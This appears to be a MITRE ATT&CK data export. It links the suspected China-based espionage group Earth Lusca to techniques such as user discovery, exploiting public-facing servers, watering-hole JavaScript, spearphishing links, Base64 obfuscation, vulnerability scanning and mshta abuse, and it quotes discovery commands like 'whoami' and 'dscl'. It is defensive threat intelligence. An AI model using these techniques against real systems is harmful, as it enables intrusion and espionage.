description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) collected information on user accounts via the <code>whoami</code> command.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--5fc9189b-7c9b-43f7-8d60-96a1f497e395
revoked : False
technique : System Owner/User Discovery
technique_description : Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Various utilities and commands may acquire this information, including <code>whoami</code>. In macOS and Linux, the currently logged in user can be identified with <code>w</code> and <code>who</code>. On macOS the <code>dscl . list /Users | grep -v '_'</code> command can also be used to enumerate user accounts. Environment variables, such as <code>%USERNAME%</code> and <code>$USER</code>, may also be used to access this information.

On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show users` and `show ssh` can be used to display users currently logged into the device.(Citation: show_ssh_users_cmd_cisco)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')]
technique_id : T1033
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows', 'Network']
data_sources : ['Active Directory: Active Directory Object Access', 'Process: OS API Execution', 'Command: Command Execution', 'Network Traffic: Network Traffic Content', 'Process: Process Creation', 'Network Traffic: Network Traffic Flow', 'Windows Registry: Windows Registry Key Access', 'File: File Access', 'Process: Process Access']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has compromised victims by directly exploiting vulnerabilities of public-facing servers, including those associated with Microsoft Exchange and Oracle GlassFish.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--b8012238-cfd9-4c5b-8759-8d86f0d6f933
revoked : False
technique : Exploit Public-Facing Application
technique_description : Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.

Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211). 

If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.

Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)

For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='initial-access')]
technique_id : T1190
matrix : mitre-attack
platform : ['Windows', 'IaaS', 'Network', 'Linux', 'macOS', 'Containers']
data_sources : ['Network Traffic: Network Traffic Content', 'Application Log: Application Log Content']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has manipulated legitimate websites to inject malicious JavaScript code as part of their watering hole operations.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--4504384f-f832-4ec2-87b0-b8dfc2208083
revoked : False
technique : JavaScript
technique_description : Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)

JScript is the Microsoft implementation of the same scripting standard. JScript is interpreted via the Windows Script engine and thus integrated with many components of Windows such as the [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and Internet Explorer HTML Application (HTA) pages.(Citation: JScrip May 2018)(Citation: Microsoft JScript 2007)(Citation: Microsoft Windows Scripts)

JavaScript for Automation (JXA) is a macOS scripting language based on JavaScript, included as part of Apple’s Open Scripting Architecture (OSA), that was introduced in OSX 10.10. Apple’s OSA provides scripting capabilities to control applications, interface with the operating system, and bridge access into the rest of Apple’s internal APIs. As of OSX 10.10, OSA only supports two languages, JXA and [AppleScript](https://attack.mitre.org/techniques/T1059/002). Scripts can be executed via the command line utility <code>osascript</code>, they can be compiled into applications or script files via <code>osacompile</code>, and they can be compiled and executed in memory of other programs by leveraging the OSAKit Framework.(Citation: Apple About Mac Scripting 2016)(Citation: SpecterOps JXA 2020)(Citation: SentinelOne macOS Red Team)(Citation: Red Canary Silver Sparrow Feb2021)(Citation: MDSec macOS JXA and VSCode)

Adversaries may abuse various implementations of JavaScript to execute various behaviors. Common uses include hosting malicious scripts on websites as part of a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or downloading and executing these script files as secondary payloads. Since these payloads are text-based, it is also very common for adversaries to obfuscate their content as part of [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')]
technique_id : T1059.007
matrix : mitre-attack
platform : ['Windows', 'macOS', 'Linux']
data_sources : ['Module: Module Load', 'Process: Process Creation', 'Script: Script Execution', 'Command: Command Execution']
permissions_required : ['User', 'Administrator', 'SYSTEM']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has sent spearphishing emails to potential targets that contained a malicious link.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--cff64310-fe63-44ad-9791-d1b4b50f0229
revoked : False
technique : Spearphishing Link
technique_description : Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place.

Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly. Additionally, adversaries may use seemingly benign links that abuse special characters to mimic legitimate websites (known as an "IDN homograph attack").(Citation: CISA IDN ST05-016) URLs may also be obfuscated by taking advantage of quirks in the URL schema, such as the acceptance of integer- or hexadecimal-based hostname formats and the automatic discarding of text before an “@” symbol: for example, `hxxp://google.com@1157586937`.(Citation: Mandiant URL Obfuscation 2023)

Adversaries may also utilize links to perform consent phishing, typically with OAuth 2.0 request URLs that when accepted by the user provide permissions/access for malicious applications, allowing adversaries to  [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: Trend Micro Pawn Storm OAuth 2017) These stolen access tokens allow the adversary to perform various actions on behalf of the user via API calls. (Citation: Microsoft OAuth 2.0 Consent Phishing 2021)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='initial-access')]
technique_id : T1566.002
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows', 'Office 365', 'SaaS', 'Google Workspace']
data_sources : ['Network Traffic: Network Traffic Flow', 'Application Log: Application Log Content', 'Network Traffic: Network Traffic Content']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) used Base64 to encode strings.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--c74dfd33-e17a-4fc7-b2bd-154499fc3ac2
revoked : False
technique : Obfuscated Files or Information
technique_description : Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. 

Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also use compressed or archived scripts, such as JavaScript. 

Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)

Adversaries may also abuse [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010) to obscure commands executed from payloads or directly via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) 
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1027
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['WMI: WMI Creation', 'Script: Script Execution', 'File: File Creation', 'Module: Module Load', 'Command: Command Execution', 'File: File Metadata', 'Process: OS API Execution', 'Windows Registry: Windows Registry Key Creation', 'Process: Process Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--5502c4e9-24ef-4d5f-8ee9-9e906c2f82c4
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has scanned for vulnerabilities in the public-facing servers of their targets.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--e0e8cd30-04d6-457c-b4c1-34145f182dad
revoked : False
technique : Vulnerability Scanning
technique_description : Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.

These scans may also include more broad attempts to [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592) that can be used to identify more commonly known, exploitable vulnerabilities. Vulnerability scans typically harvest running software and version numbers via server banners, listening ports, or other network artifacts.(Citation: OWASP Vuln Scanning) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='reconnaissance')]
technique_id : T1595.002
matrix : mitre-attack
platform : ['PRE']
data_sources : ['Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--840a987a-99bd-4a80-a5c9-0cb2baa6cade
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used `mshta.exe` to load an HTA script within a malicious .LNK file.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--a3627d9d-1c78-4b10-8b1c-3183a939862b
revoked : False
technique : Mshta
technique_description : Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017) 

